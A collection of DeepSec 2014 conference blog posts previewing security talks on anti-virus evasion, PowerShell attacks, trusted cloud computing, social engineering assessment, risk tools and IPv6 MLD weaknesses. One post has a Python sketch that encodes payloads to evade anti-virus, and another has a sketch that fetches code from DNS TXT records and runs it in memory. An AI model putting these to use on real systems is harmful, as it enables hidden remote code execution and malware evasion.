DeepSec 2014 Talk: Why Anti-Virus Software fails

Filtering inbound and outbound data is most certainly a part of your information security infrastructure. Anti-virus content filters are a prominent component. Your desktop clients probably run one, and your emails are probably read by these filters first. While techniques like this have been around for a long time, they regularly draw criticism. According to some opinions the concept of anti-virus is dead. Nevertheless it’s still a major building block of security architecture. The choice can be hard, though. DeepSec 2014 features a talk by Daniel Sauder, giving you an idea why anti-virus software can fail.

Anyone who starts to think about anti-virus evasion will see that it can be achieved fairly easily (see for example last year’s DeepSec talk by Attila Marosi). If an attacker wants to hide a binary executable file with a Metasploit payload, the main points for accomplishing this goal are (a minimal sketch follows the list):

  • encrypting/encoding the payload and using a custom shellcode binder to escape signature scanning, and
  • using a technique for evading the sandbox.
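
To illustrate the first point: signature scanners match known byte sequences, so even a trivial encoder changes what the scanner sees. The following Python sketch (the payload bytes are hypothetical stand-ins, not real shellcode) shows the XOR idea that a shellcode binder would have to reverse at runtime:

```python
import os

def xor_encode(payload: bytes, key: bytes) -> bytes:
    """XOR every payload byte with a repeating key.

    The encoded bytes no longer match the original signature;
    a small decoder stub (the binder) reverses this at runtime.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))

payload = b"\x90\x90\xcc\xc3"   # hypothetical stand-in for shellcode
key = os.urandom(4)             # a fresh key per build defeats static signatures

encoded = xor_encode(payload, key)
assert xor_encode(encoded, key) == payload  # XOR is its own inverse
print(encoded.hex())
```

A real binder additionally carries the decoder stub in executable form and has to get past sandbox emulation, which is exactly the second point above.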

By developing further evasion techniques it is possible to research the internal functionality of anti-virus products. For example, it can be determined whether a product uses x86 emulation, what the emulation is capable of, and which Microsoft Windows API calls can disturb the anti-virus engine itself. Other tests include building an .exe file without a payload generated by msfpayload or other well-known attack tools, as well as 64-bit payloads and escaping techniques.

At the time of writing, Daniel Sauder has developed 36 different techniques as proof-of-concept code and tested them against 8 different anti-virus products. More techniques and engines are pending. Together with documentation, papers, and talks from other researchers, this gives a deeper understanding of how anti-virus software works and shows where it fails, both in general and in particular cases.

Anti-virus software is no magic solution that always works perfectly. If you run filters of this kind, we recommend attending Daniel’s talk. Once you know how your defence mechanisms fail, you can work on improving them.

DeepSec 2014 Talk: Advanced Powershell Threat – Lethal Client Side Attacks

Modern environments feature a lot of platforms that can execute code through a variety of frameworks. There are UNIX® shells, lots of interpreted languages, macros of all kinds (Office applications or otherwise), and there is the Microsoft Windows PowerShell. Once you find a client, you will usually find a suitable scripting engine. This is very important for defending networks and – of course – for attacking them. Nikhil Mittal will present ways to use PowerShell to attack networks from the inside via the exploitation of clients.

PowerShell is the “official” shell and scripting language for Windows. It is installed by default on all post-Vista Windows systems and is found even on XP and Windows 2003 machines in an enterprise network. Built on the .NET framework, PowerShell allows interaction with almost everything one finds on a Windows machine and network. One can access the system registry, the Windows API, WMI, COM objects, .NET libraries, other machines on the network, and so on. It is very useful for system administrators, which makes it an ideal tool and platform for penetration testers as well.

PowerShell has various distinct advantages over binaries and other non-Windows scripting languages. It is trusted by the operating system, by system administrators, and by anti-virus software. It is possible to perform various attacks using PowerShell without dropping anything to disk. Add to this the ability to natively interact with the machine and the network, and you have a tool for penetration tests which is too good to be true!

There has been much interesting work on the usage of PowerShell in penetration tests. The talk will introduce Nishang, a toolkit for using PowerShell in penetration tests. Its scripts are divided into the following categories:

  • Backdoors – Contains DNS, HTTP and SSID backdoors.
  • Escalation – Escalate privileges, introduce vulnerabilities.
  • Execution – Execute code in memory using DNS TXT records (see the sketch after this list), get authenticated shell access to an MSSQL Server.
  • Gather – Log keystrokes, get credentials in plain text, check for open ports on a target, dump the SAM file, WLAN keys, and LSA Secrets.
  • Pivot – Execute PowerShell commands and scripts on other machines in network.
  • Scan – Port scanning and brute forcing.
  • Utility – Add persistence, exfiltrate data, encode scripts.
  • Powerpreter – A script module with almost all the functionality of Nishang in a single script.
  • Antak – A webshell in ASP.NET which utilizes PowerShell.
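
Nishang’s scripts are written in PowerShell; as a language-neutral illustration of the DNS TXT technique from the Execution category, here is a hedged Python sketch of the underlying idea (assuming the dnspython package and a hypothetical record name) – code is fetched from DNS and run in memory, so nothing touches the disk:

```python
import base64

import dns.resolver  # third-party package: dnspython

def run_from_txt(record_name: str) -> None:
    """Fetch base64-encoded code from DNS TXT records and run it in memory."""
    answers = dns.resolver.resolve(record_name, "TXT")
    # Long payloads are split across several TXT strings; join the chunks.
    blob = b"".join(s for rdata in answers for s in rdata.strings)
    exec(base64.b64decode(blob).decode())  # never written to disk

# Hypothetical record under the tester's control:
# run_from_txt("payload.example.com")
```

DNS traffic often passes outbound filters unnoticed, which is what makes this delivery channel attractive for penetration testers.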

One question frequently asked by users of Nishang is this: How could PowerShell be used to get access to a network? Could it be used to gain a foothold in an enterprise network? Yes, of course – use client-side attacks.

This presentation will demonstrate that a client-side attack with PowerShell is very effective, as it exploits human ignorance and uses features of PowerShell – both inherent to any enterprise network. The attacks demonstrated include phishing (the user clicks on a link), malicious attachments (MS Word and Excel), malicious shortcuts (.LNK files), and attacks using Java applets and Human Interface Devices (HIDs).

There have been many instances of PowerShell being used by malware writers for client-side attacks. Notable examples include a Russian ransomware, malware infecting MS Office files, and malicious shortcuts.

The PowerShell scripts that will be presented in this talk draw inspiration from some of the above attacks.

This talk should be attended by those who do external penetration tests and would like to know more about using PowerShell for this purpose. System administrators should also attend to understand the latest tools used by attackers.

For anyone intending to dive deeper into the powers of PowerShell, we strongly recommend booking Nikhil’s training course, also held at DeepSec 2014.

DeepSec 2014 Talk: Trusting Your Cloud Provider – Protecting Private Virtual Machines

The „Cloud“ technology has been in the news recently. No matter if you use „The Cloud™“ or any other technology for outsourcing data, processes and computing, you probably don’t want to forget about trust issues. Scattering all your documents across the Internet doesn’t require a „Cloud“ provider (you only need to click on that email with the lottery winnings). Outsourcing any part of your information technology sadly requires a trust relationship. How do you solve this problem? Armin Simma of the Vorarlberg University of Applied Sciences has some ideas and will present them at DeepSec 2014.

The presentation shows a combination of technologies for making clouds trustworthy. One of the top inhibitors to moving (virtual machines) to the cloud is security. Cloud customers do not fully trust cloud providers. The problem with sending virtual machines to the cloud is that „traditional“ encryption is no solution, because encrypted data (equal to code in our case) cannot be executed. Taking a closer look at the numerous surveys about cloud adoption (and at the inhibitors to moving to the cloud), it can be seen that insider attacks rank among the most critical attacks. The insider in our scenario is the administrator (or a user with high/elevated privileges).

The key point is: the cloud customer does not trust the administrator of the cloud provider’s system.

The solution to this problem is based on

  1. Trusted Computing technology and
  2. Mandatory Access Control.

Mandatory Access Control is used to prevent the administrator – who must be able to administer and thus access the host system – from accessing Virtual Machines running on top of the cloud provider’s system(s). Our system is able to log all activities of users. Users (including the administrator himself/herself) are not able to manipulate this log.

The former technology – Trusted Computing – is used as a mechanism for giving the cloud customer proof that the system hosting his Virtual Machines (= the cloud provider’s infrastructure) was not manipulated. The proof is hardware-based: it prevents several kinds of attacks, e.g. rootkits or other BIOS-manipulating attacks. The proof is based on measuring all system parts which have been executed since boot time of the physical machine. Each part is measured before execution. This „measurement chain“ is called Trusted Boot. Standardised tamper-resistant hardware (the TPM) plus a standardised protocol allows for the proof to be given to the customer. The proof is called attestation.
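
The core of the measurement chain can be sketched in a few lines. This is a software simulation for illustration only (real measurements live in the TPM’s Platform Configuration Registers), showing why the chain detects any modified or reordered component:

```python
import hashlib

def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM-style extend: the new register value hashes the old value
    together with the new measurement, so order matters and no step
    can be altered without changing the final value."""
    return hashlib.sha1(pcr + measurement).digest()

pcr = b"\x00" * 20  # registers start zeroed at power-on (TPM 1.2 uses SHA-1)
for component in [b"firmware", b"bootloader", b"kernel", b"hypervisor"]:
    pcr = extend(pcr, hashlib.sha1(component).digest())

print(pcr.hex())  # attestation compares this against reference values
```

A single flipped bit in any component yields a completely different final value, which is what the attestation protocol reports to the customer.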

A second technology used for securing the cloud is Trusted Computing’s sealing mechanism. Sealing is an extension of asymmetric encryption: the decryption is done within the hardware (TPM), but only if the current measurement values are equal to predefined reference values. The reference values are defined by the cloud customer and specify a known good system plus system configuration. These techniques (Trusted Boot, Attestation, Sealing) allow the cloud customer to be sure that a specific (trustworthy) system is running on the provider’s site.
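
A minimal software simulation of the sealing idea (purely illustrative; real sealing happens inside the TPM, typically protecting a key rather than raw data):

```python
import hashlib

def seal(secret: bytes, reference_pcr: bytes) -> dict:
    """Bind a secret to a known-good platform state chosen by the customer."""
    return {"secret": secret, "bound_to": hashlib.sha256(reference_pcr).digest()}

def unseal(sealed: dict, current_pcr: bytes) -> bytes:
    """Release the secret only if the measured state matches the reference."""
    if hashlib.sha256(current_pcr).digest() != sealed["bound_to"]:
        raise PermissionError("platform state differs from reference values")
    return sealed["secret"]

good_pcr = b"known good system configuration"
blob = seal(b"VM disk encryption key", good_pcr)
print(unseal(blob, good_pcr))     # state matches: secret released
# unseal(blob, b"tampered BIOS")  # raises PermissionError
```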

Armin’s talk is of interest to implementers and users of „Cloud“ infrastructure alike. In case you are playing with Trusted Computing, you should attend his talk as well.

DeepSec 2014 Talk: An innovative and comprehensive Framework for Social Vulnerability Assessment

Do you get a lot of email? Do customers and business partners send you documents? Do you talk to people on the phone? Then you might be interested in an assessment of your vulnerability by social interactions. We are proud to host a presentation by Enrico Frumento of CEFRIEL covering this topic.

As probably everyone knows by now, spear-phishing is one of the most effective threats, and it is often used as the first step of most sophisticated attacks. Even the recent JP Morgan Chase data breach seems to have originated from a single employee (just one was enough!) who was targeted by a contextualised mail. In this scenario it is hence of paramount importance to consider the human factor in companies’ risk analyses. But is every company potentially vulnerable to these kinds of attacks? And how can this risk be evaluated through a specific vulnerability assessment?

These are the questions we will try to address. Since 2010, when we presented our study about a Cognitive Approach for Social Engineering at the DeepSec 2010 conference, we have been working on extending traditional security assessments beyond technology to include the „social“ context. In these years we have had the opportunity to work on this topic with several big European enterprises, which allowed us to face the difficulties related to the impact of this kind of activity on the relationship between employees and employer, both from an ethical and a legal point of view.

This experience allowed us to develop a specific methodology for performing Social Vulnerability Assessments (SVA), ensuring ethical respect for employees and legal compliance with European work regulations and standards. The legal constraints, which shape the limits of what these assessments can investigate, are quite cumbersome to understand, but we have gained solid experience, especially within the Italian legal framework, which allows the execution of these studies. We now regularly perform Social Vulnerability Assessments in enterprises as an integrated service.
Using our methodology, we have performed about 15 Social Vulnerability Assessments over the years in big enterprises with thousands of employees (roughly 10,000 people in total): this gave us relevant first-hand insight into the real vulnerability of enterprises to modern non-conventional security threats.

In this talk we will share our experience, describe how we conduct a Social Vulnerability Assessment, and present an overview of the results collected so far. These results may help you understand the level of risk related to spear-phishing attacks inside companies – and some conclusions may be unexpected.

We highly recommend attending this presentation if you have to face advanced attacks against your organisation.

DeepSec 2014 Talk: Build Yourself a Risk Assessment Tool

All good defences start with some good ideas. This is also true for information security. DeepSec 2014 features a presentation by Vlado Luknar, who will give you decent hints and a guideline on how to approach the dreaded risk assessment with readily available tools. We have kindly asked Vlado to give you a detailed teaser on what to expect:

It seems fairly obvious that every discussion about information security starts with a risk assessment. Otherwise, how do we know what needs to be protected, and how much effort and resources we should put into preventing security incidents and potential business disasters? With limited time and budget at hand, we’d better know very well where to look first and what matters most.

If we look at some opinion-making bodies in information security, such as ISF, ISACA or (ISC)², and of course, at ISO/IEC standards (the 27000 series), we can see that in information security there is no escape from risk assessment. A difficult question for anyone responsible for managing information security is to decide when to rely on best practice or baseline security controls and when to apply risk assessment and in what detail.

Risk assessment in information security is, at least in theory, quite self-evident. We have to

  • look at business objectives,
  • identify assets these objectives are built upon,
  • identify the core underlying systems that represent the assets,
  • estimate the potential impact (I) on these assets if something goes wrong (a threat materializes), and
  • identify threats to these assets by looking at related vulnerabilities and countermeasures eliminating them (probability – P).

In the end, we arrive at our risk R by calculating impact times probability (R = I×P), almost certainly identifying some actions to perform (i.e. measures to mitigate the risk, either its impact or its probability). A minimal sketch of this bookkeeping follows.
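
The assets, threats, and the 1–5 scales below are made-up examples for illustration, not part of any standard:

```python
# Impact (I) and probability (P) on an assumed 1-5 scale; risk R = I * P.
threats = [
    {"asset": "customer database", "threat": "SQL injection",  "impact": 5, "probability": 3},
    {"asset": "mail gateway",      "threat": "spear-phishing", "impact": 4, "probability": 4},
    {"asset": "office WLAN",       "threat": "weak WPA2 key",  "impact": 2, "probability": 2},
]

for t in threats:
    t["risk"] = t["impact"] * t["probability"]

# Highest risk first: where limited time and budget should go.
for t in sorted(threats, key=lambda t: t["risk"], reverse=True):
    print(f'{t["risk"]:>2}  {t["asset"]}: {t["threat"]}')
```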

Well, that’s the easy part. Now we are supposed to repeat this risk assessment – either as soon as any of these variables changes (objective, asset, system, threat, vulnerability, control) or at least once per agreed-on period of time.

In general, existing security compliance frameworks (e.g. ISO/IEC 27001, COBIT, PCI DSS) do not dictate any specific risk assessment methodologies or tools. The common agreement seems to be: stick to the scheme of asset-threat-vulnerability-control and use whatever suits you to objectively reduce risks – anything that allows you to be consistent, reproducible and measurable.

And this is the moment you start looking for a risk assessment tool, be it a commercial or an open-source one. In fact, your security team may be small and may have no risk assessment specialist. Yet you need to be structured about your security risk decisions in an easy and efficient manner every time you run an assessment, hoping that if you don’t catch something important in this run, you will succeed in the next iteration – or an incident will teach you about it the hard way.

How many risk assessment methodologies for information security can we find on the Internet today? If you filter out government- and consultancy-related methodologies (mostly without a tangible product you could buy), you end up with a list of 15-20 different methodologies, some of which also comprise a risk assessment tool. This might seem like a lot – but only until you try to implement one of them in your organization.

You start with the first one and realize it needs weeks of training because its learning curve is so steep; another uses awkward terminology; the next one has some strange threat categories mixing apples with oranges, or uses just plain old references (talking about Windows 95, fax machines and dial-up connections); and another one requires a series of complicated installation and configuration steps (plus a highly privileged account on your desktop). And yet another group of tools talks about scanning and vulnerability management instead of risk assessment.

In fact, if you are a security manager in a small to medium-sized company where every security topic passes through your hands, you might be better off using your own tool, because building one is not rocket science and does not take that much time. You develop its features as you go, and by doing so you capture all the internal knowledge that might otherwise be lost.

Over the years of being a security practitioner in a commercial organization I have learned a few things.

  • The quest for a perfect ready-made tool is useless, because it is you and your team who add the most value in the process (the tool will not have the “knowledge” on its own).
  • In case you think you did find a perfect product built by someone else, think again: are you sure it is you – not the tool – who discovers risks?
  • Simple things work the best: the more complicated the tool, the less focused you stay on the subject-matter (i.e. the risks); not everything needs to be assessed thoroughly at the same time and at the same level of detail; not everything needs to be automated and re-calculated in real-time.
  • The tool should be pre-defined and structured only to some extent, not limiting your creativity and knowledge of the context (translated as your “internal expertise”).
  • Tools come and go and you may get stuck with a quite expensive product nobody supports any more and your own knowledge recorded in there may not be easily accessible.
  • When you hit the proper balance between a pre-defined, mandatory check-list and creativity, you’ll be focusing only on those things that are the most important – those that, in a given context, make or break the security of your product or service.

The presentation is not about the latest advances in information security risk assessment. It will describe the process of building a practical, wiki-based tool, starting with publicly available resources: threats, vulnerabilities and controls (mostly from ISO/IEC 2700X) that are merged into a light ecosystem which is configured, improved and used only via a web browser. Such an ecosystem – actually an Information Security Management System called RISSCON – is used daily in a real company (Orange Slovensko a.s.) to keep up with the requirements of ISO/IEC 27001.

DeepSec 2014 Talk: MLD Considered Harmful – Breaking Another IPv6 Subprotocol

In case you haven’t noticed, the Internet is getting crowded. Next to billions of people being online, their devices are starting to follow. Information security experts can’t wait to see this happen. The future relies on the Internet Protocol version 6 (IPv6). IPv6 features a lot of improvements over IPv4. Since you cannot get complex stuff right the first time, IPv6 brings some security implications with it. Past and present conferences have talked about this, and DeepSec 2014 is no exception. Enno Rey of ERNW will talk about Multicast Listener Discovery (MLD) in his presentation.

The presentation marks the first publication of results from ongoing research on MLD. MLD is a protocol belonging to the IPv6 family, and sadly it features insecurities. MLD (Multicast Listener Discovery) and its successor, MLDv2, are used by IPv6 routers for discovering multicast listeners on a directly attached link, much like the Internet Group Management Protocol (IGMP) is used in IPv4. Even if you haven’t realised it yet, MLD is already everywhere. Many multicast applications base their operation on MLD when the underlying layer-3 protocol is IPv6, while most modern operating systems (OS), like Windows, Linux and FreeBSD, not only come pre-configured with IPv6 enabled, but also start up by sending MLD traffic, which is repeated periodically. Despite this out-of-the-box usage, MLD is one of the IPv6 protocols that have not yet been studied to a suitable extent, especially as far as potential security implications are concerned. As will be shown, these can vary from OS fingerprinting on the local link by passively sniffing the wire (see the sketch below) to amplified Denial of Service attacks.
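
To give an idea of the passive fingerprinting angle, here is a hedged Python sketch using Scapy (assuming the library is installed, root privileges, and an interface named eth0); it only listens for the MLDv1 reports that hosts emit on their own:

```python
from scapy.all import sniff
from scapy.layers.inet6 import IPv6, ICMPv6MLReport

def on_packet(pkt):
    """Log which host reports membership for which multicast group.

    Hosts send these reports unsolicited at start-up and repeat them
    periodically; timing and group addresses can hint at the OS in use.
    """
    if pkt.haslayer(ICMPv6MLReport):
        print(f"{pkt[IPv6].src} listens to {pkt[ICMPv6MLReport].mladdr}")

# Purely passive: not a single packet is sent.
sniff(iface="eth0", filter="icmp6", prn=on_packet)
```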

Specifically, in this talk, after presenting the results of the analysis of the default behaviour of some of the most popular OS, we will examine, using specialised tools, whether the specific OS implementations conform to the security measures defined by the corresponding RFCs, and if not, what the potential security implications are. Then, by diving into the specifications of the protocol, we will discuss potential security issues related to the design of MLD and how they can be exploited by attackers. Finally, specific mitigation techniques will be proposed to defend against them, which will allow us to secure IPv6 networks to the best possible extent in the emerging IPv6 era.

Let’s make the IPv6 world a safer place! ☻

For anyone dealing with IPv6, DeepSec 2014 also offers a two day training IPv6 Attacks and Defenses – A Hands-on Workshop, held by Enno himself.

Internet service providers have already rolled out IPv6, especially for hosted or co-located environments. Furthermore, IPv6 connectivity is widely available by means of tunnels (Teredo, for example). This is why we recommend Enno’s talk and training to anyone using networks (an Internet connection is optional, since most operating systems use IPv6 locally anyway). Deal with your network before attackers do!

DeepSec 2014 Keynote: The Measured CSO

It’s good if your organisation has someone to take on information security. However, it’s bad if you are the person in this position. Few are lucky enough to actually deal with improving information security. Some are caught up in compliance, fighting an uphill struggle against regulations and audits that have nothing to do with the threats to their business.

The management of Information Security has become over-regulated and to some degree, over-focused on compliance to policy/regulation, architectural decisions, network access, and vulnerability management. As a result, many CISOs struggle to define success in terms that match the goals of their business, and struggle to make their risk management efforts relevant to senior executives.

How do you achieve that? Alex Hutton will tell you in his keynote at DeepSec 2014. His goal is for attendees to walk away from the talk with two things. First, a technique they can take back to their jobs that will help them make the concept of “aligning security with the business” less of a platitude and more of a reality. Second, a new, threat-centric framework that uses metrics to understand how security operations reduce risk.

Curious? Cursed with being a CSO? Dreaming of becoming one someday? Having nightmares about metrics? Well, then you should probably avoid missing Alex’s keynote!

EuroTrashSecurity Podcast – Microtrash37 : DeepSec 2014 Content

Microtrash37 of the EuroTrashSecurity podcast is out! We had a little talk with Chris about the schedule of DeepSec 2014 and what to expect. It’s a teaser for the blog articles about the talks and the trainings to come. We will describe more details on the blog, but the audio gives you a good overview of what to expect.

We also got some inside information about the upcoming BSidesVienna 0x7DE. We will definitely attend, and so should you! BSidesVienna has some cool surprises for you. Don’t miss out on the chance to get together. The Call for Papers is still open! If you have something to share, please consider submitting a talk.

BSidesVienna 2014 – Call for Papers still open

BSidesVienna is back! And the organisation team is looking for talks.

BSidesVienna was started in 2011, and there were some smaller BSides-like events in Vienna in the past two years. BSidesVienna 2014 is planned for 22 November 2014 (right after DeepSec 2014). The call for papers will close on 30 September 2014, so if you have interesting stuff you want to show on stage, submit it to the BSidesVienna team.

You can’t keep a good con down… so let’s have fun and infosec talks at BSidesVienna 2014!

Preliminary Schedule of DeepSec 2014 published

After weeks of hard work we now have the preliminary schedule of DeepSec 2014 online! We received over a hundred submissions, and we had to navigate through a lot of publications, abstracts and references. We hope that you like the mixture of topics. We especially hope that you will find the offered trainings interesting.

We are still waiting for content and corrections, so bear with us while the schedule takes its final form. Contrary to past years, we had a lot more to do in terms of completing information about submitted talks and trainings. We will tell you more about this in upcoming blog articles (which we will announce on our Twitter account, so you don’t miss anything).

Looking forward to seeing you in Vienna in November!

Reviewing all your Submissions for DeepSec 2014

The Call for Papers of DeepSec 2014 officially ended yesterday. We are currently reviewing all your submissions and will publish the preliminary schedule in the course of the next two weeks. As always, you did a very good job of finding things to break and exploit. Our choice of what to include in the schedule will be pretty hard!

For those who still have bright ideas and had no time to submit: please send us your abstracts as soon as possible! We will consider everything submitted so far first, but we will still take your proposals into account. You just need to tell us.

Reminder: Call for Papers DeepSec 2014

The Call for Papers of DeepSec 2014 is still open. Since its motto is the power of knowledge, we address everyone who has knowledge. Information is the „cyber“ weapon of the 21st century, we have heard. So if you know about the 0day that affects half the Internet, you should definitely think about presenting it at DeepSec 2014. ☻

Seriously, we have chosen this motto because a lot of issues in information security deal with knowledge. If your IT staff knows about the latest threats, the capabilities of the defences, the state of the systems, and how to deal with problems, then you have a distinct advantage. Not knowing is usually the first step towards running into problems. In this tradition we prefer disclosure of security-related knowledge. The dreaded CVE-2014-0160 is a good example. Imagine OpenSSL deployments still had the Heartbleed bug (which some of them still do, sadly) and no one knew about it. Ignorance isn’t always bliss. Disclosing this information will eventually render offensive tools ineffective. This was discussed by FX in his keynote for DeepSec 2012.

The submissions we have received so far look very promising. Can you think of ways in which knowledge can affect information security for better or worse? We bet you can, so let us know.

Ticket Registration is open

The ticket registration for DeepSec 2014 „The Octave“ is open. You can either use the embedded version on the DeepSec web site or go directly to the ticketing site. Tickets are now available at the early bird tariff. Make sure you get your tickets as soon as possible – the later tariffs are more expensive.

The current Call for Papers for DeepSec 2014 (and DeepINTEL 2015) is open, and we are looking for talks applying the power of knowledge to information security. Would you like to know more?

New Use Cases for Bitcoin

Although I’m new to the Bitcoin world, I had quite a promising start. Earlier this month I was able to visit the Bitcoin Conference in Amsterdam and had some very good conversations with core developers from the Bitcoin Foundation. I also had the honour of talking to Gavin Andresen, long-time lead developer and now chief scientist of the Bitcoin Foundation.

At DeepSec, our first contact with Bitcoin was in 2012, when John Matonis, now Executive Director and Board Member of the Bitcoin Foundation, talked about the evolution of e-money. But since then we haven’t had much contact.

Tomorrow I will visit the Bitcoin Expo in Vienna and hope to meet new people in the community and discuss the latest trends and developments.

The fascinating thing about Bitcoin and the global block chain is the cryptographic background and the decentralized consensus algorithm. This distributed algorithm is primarily used today to “sign” transactions of Bitcoins, but it also offers the opportunity to “deposit” text messages, which are, so to speak, “notarized” in a distributed, decentralized way.
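
In practice one usually anchors a hash of the message or document rather than the text itself. A small Python sketch of the digest one would embed, for instance in an OP_RETURN output (the message is of course made up):

```python
import hashlib

def notarization_digest(document: bytes) -> str:
    """SHA-256 digest to anchor in a transaction: the block chain
    timestamps the hash, proving the document existed unchanged at
    that point, without revealing its content."""
    return hashlib.sha256(document).hexdigest()

print(notarization_digest(b"This message existed before block N."))
# The 32-byte digest is small enough to embed in an OP_RETURN output.
```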

New Use Cases for the Block-Chain

Ethereum, for example, borrows the decentralized consensus of Bitcoin and adds a “Turing-complete” programming language to the blockchain in the form of the so-called EVM, or Ethereum Virtual Machine. In Ethereum, messages – or transactions – can contain code, the so-called contract. The code in the contract can be used to control financial or semi-financial applications which handle transactions of e-money, but it can also be used for non-financial applications like e-voting, decentralized e-government and possibly security applications.

Rivetz suggests building a bridge between trusted computing and the decentralized digital transactions of the Bitcoin world. Steven Sprague, CEO, gave me a quick introduction to some of the ideas: for example, a TPM module could push security fingerprints of a system into the block chain and access them later to check for inconsistencies or modifications. He called this application the “digital birth certificate” of a machine.

Standards will be appreciated

Although the Bitcoin community doesn’t completely agree, there is quite a large interest in an open standard, possibly even an IETF RFC, describing the Bitcoin protocol family. Currently Bitcoin is published as reference code on GitHub without a full formal description of the protocol and its interactions. Standardization efforts focus on the usage of the API of this reference code.

Many stakeholders, like Bitcoin exchanges, vendors of Bitcoin miners, and third-party software vendors who interact with the Bitcoin network, would like to see a formal open standard in addition to the reference code, to facilitate new applications like the ones described above.

Maybe next year, or when Bitcoin reaches version 1.0, we will have the first drafts available.

I’m curious about the Bitcoin Expo tomorrow and I will post an update soon.

IT Security without Borders

U.S. government officials are considering preventing Chinese nationals from attending hacking and IT security conferences by denying visas. The idea is „to curb Chinese cyber espionage“. While this initiative has been widely criticised and the measure is very easy to circumvent, it doesn’t come as a surprise. Recent years have shown that hacking has become more and more political. This aspect was already explored in the keynote of DeepSec 2012. So what is the real problem?

Espionage, be it „cyber“ or not, revolves around information. This is exactly why we have a problem with the word „cyber“. Methods of transporting information have been around for a long time. Guglielmo Marconi and Heinrich Hertz raised problems for information security long before the Internet did. The only difference is the ease of setting up Internet connectivity compared to wireless transmissions (if you discount Wi-Fi networks). Technology has crossed borders ever since the first wireless transmission. Networked drones, the Internet of Things, and other developments are just extensions of these technological concepts. Moreover, IT security is a team effort. No country, no business, no organisation, and no hacker group can implement a „fail-safe“ security concept by itself. Being part of the Internet means being connected to the weakest link, like it or not. End points with full-disk encryption and the latest VPN setup compromised by malicious software are the perfect example. If firewalls can’t do perimeter protection on their own, neither can blocked visa requests.

DeepSec has maintained its neutral stance throughout the years. IT security needs places where every group can talk freely to other groups (or individuals). DeepSec is still the conference to go to, where security professionals from academia, government, industry, and the (underground) hacking community can have a chat. The Call for Papers, titled „The Power of Knowledge“, stresses this. If you have content illustrating the role of cooperation in IT security, we are very keen to hear from you!